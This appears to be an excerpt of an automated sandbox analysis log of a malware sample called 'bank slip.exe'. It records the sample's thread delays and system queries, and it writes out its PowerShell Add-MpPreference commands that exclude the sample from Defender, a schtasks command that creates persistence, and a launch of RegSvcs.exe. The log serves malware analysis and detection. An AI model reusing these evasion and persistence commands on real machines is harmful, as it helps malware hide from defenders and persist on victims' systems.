Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\bank slip.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99733Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99625Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99515Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99401Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99280Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99052Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98878Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97594Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97269Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97141Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97007Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96839Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96714Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96047Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95827Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95719Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95062Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94950Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99748
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99634
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99521
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99097
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98689
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94171
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93721
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93484
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: RegSvcs.exe, 00000009.00000002.2112938225.0000000006270000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3252060777.00000000063B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
                        Source: C:\Users\user\Desktop\bank slip.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Users\user\Desktop\bank slip.exe Queries volume information: C:\Users\user\Desktop\bank slip.exe VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Queries volume information: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe VolumeInformation
